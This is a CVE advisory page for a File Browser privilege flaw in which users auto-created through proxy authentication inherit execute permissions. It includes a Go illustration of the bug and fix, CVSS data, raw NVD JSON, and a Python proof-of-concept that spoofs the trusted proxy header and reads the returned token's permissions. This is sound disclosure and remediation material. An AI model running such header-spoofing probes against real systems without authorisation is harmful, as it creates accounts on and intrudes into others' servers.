Security Vulnerability Report
CVE-2026-35607 CVSS 8.1 HIGH

Published: 2026-04-07 17:16:35
Last Modified: 2026-04-16 18:14:57

Description

File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to 2.63.1, the fix in commit b6a4fb1 ("self-registered users don't get execute perms") stripped Execute permission and Commands from users created via the signup handler. The same fix was not applied to the proxy auth handler. Users auto-created on first successful proxy-auth login are granted execution capabilities from global defaults, even though the signup path was explicitly changed to prevent execution rights from being inherited by automatically provisioned accounts. This vulnerability is fixed in 2.63.1.
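The bug is a drift between two auto-provisioning paths that should have shared one rule. The Go sketch below is an added illustration of that pattern and its fix; it is not File Browser's code and not the patch in PR 5890. The type names, the `stripExec` helper and the `CanExecute` gate (execute flag set, and the command's first word on the user's allow-list) are simplified stand-ins, and the defaults in `main` are a constructed scenario. One inference worth stating plainly: the vulnerable path only ever copies what the global defaults contain, so an instance whose defaults already have Execute off and an empty Commands list hands the auto-created account nothing dangerous, which is the operator-side mitigation until 2.63.1 is deployed.

```go
package main

import (
	"fmt"
	"strings"
)

// Illustration of the CVE-2026-35607 pattern, not File Browser's own code:
// the types and helpers below are simplified stand-ins (assumption).

// Perm models the per-user permission flags; only the relevant ones are kept.
type Perm struct {
	Admin   bool
	Execute bool
}

// User is an account record. Commands is the allow-list of command names the
// account may run through the "execute" feature.
type User struct {
	Username string
	Perm     Perm
	Commands []string
}

// Defaults stands in for the instance-wide defaults every auto-provisioned
// account is copied from.
type Defaults struct {
	Perm     Perm
	Commands []string
}

// newFromDefaults copies the global defaults into a fresh account.
func newFromDefaults(d Defaults, username string) *User {
	return &User{
		Username: username,
		Perm:     d.Perm,
		Commands: append([]string(nil), d.Commands...),
	}
}

// stripExec removes the execution capabilities an auto-created account must
// never inherit (the effect commit b6a4fb1 had on the signup path).
func stripExec(u *User) {
	u.Perm.Execute = false
	u.Commands = nil
}

// signupCreate models the signup handler after b6a4fb1: defaults, then strip.
func signupCreate(d Defaults, username string) *User {
	u := newFromDefaults(d, username)
	stripExec(u)
	return u
}

// proxyCreateVulnerable models the proxy-auth handler before 2.63.1: the new
// account receives the global defaults verbatim, execute rights included.
func proxyCreateVulnerable(d Defaults, username string) *User {
	return newFromDefaults(d, username)
}

// proxyCreateFixed is the shape of the 2.63.1 fix: both auto-provisioning
// paths run the same stripping step, so they cannot drift apart again.
func proxyCreateFixed(d Defaults, username string) *User {
	u := newFromDefaults(d, username)
	stripExec(u)
	return u
}

// CanExecute models the server-side gate on running a command: the execute
// flag must be set and the command's first word must be on the allow-list.
func CanExecute(u *User, command string) bool {
	if !u.Perm.Execute {
		return false
	}
	fields := strings.Fields(command)
	if len(fields) == 0 {
		return false
	}
	for _, allowed := range u.Commands {
		if allowed == fields[0] {
			return true
		}
	}
	return false
}

func main() {
	// Constructed scenario: an operator left execute on in the global defaults
	// with two allowed commands. Nothing else is needed to trigger the bug.
	defaults := Defaults{Perm: Perm{Execute: true}, Commands: []string{"git", "ls"}}
	cases := []struct {
		path string
		user *User
	}{
		{"signup (post-b6a4fb1)", signupCreate(defaults, "bob")},
		{"proxy auth (< 2.63.1)", proxyCreateVulnerable(defaults, "alice")},
		{"proxy auth (2.63.1)", proxyCreateFixed(defaults, "alice")},
	}
	for _, c := range cases {
		fmt.Printf("%-24s can run 'ls -la': %v\n", c.path, CanExecute(c.user, "ls -la"))
	}
}
```

Running it prints `true` only for the pre-2.63.1 proxy-auth row. The design point is the shared `stripExec` step: once both handlers call the same helper, a future change to the defaults or to one handler cannot silently re-grant execution to the other path.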

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

The 8.1 above is the CNA (GitHub) assessment. NVD's primary assessment of the same issue is 8.8 HIGH with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H; the two agree on the impact metrics and differ only on attack complexity and privileges required, i.e. on how hard it is to reach the proxy-auth login path with a header the instance will accept. Weakness assigned by the CNA: CWE-269 (Improper Privilege Management).

Configurations (Affected Products)

cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:* - VULNERABLE
File Browser < 2.63.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Two caveats before running it: a successful probe leaves a persistent account on the target that you will have to delete, and the result is only meaningful when the instance's global defaults grant Execute or a non-empty Commands list, since that is all the vulnerable path copies from.
python
# PoC concept for CVE-2026-35607: an account auto-created on first proxy-auth
# login inherits execute rights from the global defaults.
#
# Assumptions (not taken from the advisory): the instance runs with the proxy
# auth method, the trusted header name is X-Remote-User (it is configured by
# the operator), the login endpoint is /api/login, and the JWT it returns
# carries the user's "perm" flags and "commands" list in its claims.
import base64
import json
import sys

import requests

TARGET_URL = "http://target-filebrowser.example"  # placeholder target
PROXY_HEADER = "X-Remote-User"                   # whatever the deployment trusts
USERNAME = "cve-2026-35607-probe"                # a username that does not exist yet


def decode_jwt_claims(token: str) -> dict:
    """Return the JWT payload without verifying the signature (read-only use)."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))


def has_exec_rights(claims: dict) -> bool:
    """True if the account carries either the execute flag or a commands list."""
    user = claims.get("user", {})
    return bool(user.get("perm", {}).get("execute")) or bool(user.get("commands"))


def main() -> int:
    session = requests.Session()

    # Step 1: first login with the trusted header. On a vulnerable instance
    # this auto-creates USERNAME from the global defaults.
    resp = session.get(f"{TARGET_URL}/api/login",
                       headers={PROXY_HEADER: USERNAME}, timeout=10)
    if resp.status_code != 200:
        print(f"[-] Proxy-auth login failed: HTTP {resp.status_code}")
        return 1
    print("[+] Proxy-auth login succeeded; account was created or already existed.")

    # Step 2: inspect the permissions the new account was handed.
    try:
        claims = decode_jwt_claims(resp.text.strip())
    except (ValueError, IndexError):
        print("[-] Response was not a JWT; check the endpoint assumption.")
        return 1
    user = claims.get("user", {})
    if has_exec_rights(claims):
        print(f"[!] Auto-provisioned user has execution rights: "
              f"perm={user.get('perm')} commands={user.get('commands')}")
        return 0
    print("[-] No execution rights: patched, or global defaults already deny execution.")
    return 2


if __name__ == "__main__":
    sys.exit(main())

References

https://github.com/filebrowser/filebrowser/pull/5890 (Patch)
https://github.com/filebrowser/filebrowser/security/advisories/GHSA-7526-j432-6ppp (Vendor Advisory, Exploit)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35607", "sourceIdentifier": "[email protected]", "published": "2026-04-07T17:16:34.890", "lastModified": "2026-04-16T18:14:56.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to 2.63.1, the fix in commit b6a4fb1 (\"self-registered users don't get execute perms\") stripped Execute permission and Commands from users created via the signup handler. The same fix was not applied to the proxy auth handler. Users auto-created on first successful proxy-auth login are granted execution capabilities from global defaults, even though the signup path was explicitly changed to prevent execution rights from being inherited by automatically provisioned accounts. This vulnerability is fixed in 2.63.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.63.0", "matchCriteriaId": "54261F6E-C227-4443-97D3-7C18CDAB15C1"}]}]}], "references": [{"url": "https://github.com/filebrowser/filebrowser/pull/5890", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-7526-j432-6ppp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-7526-j432-6ppp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}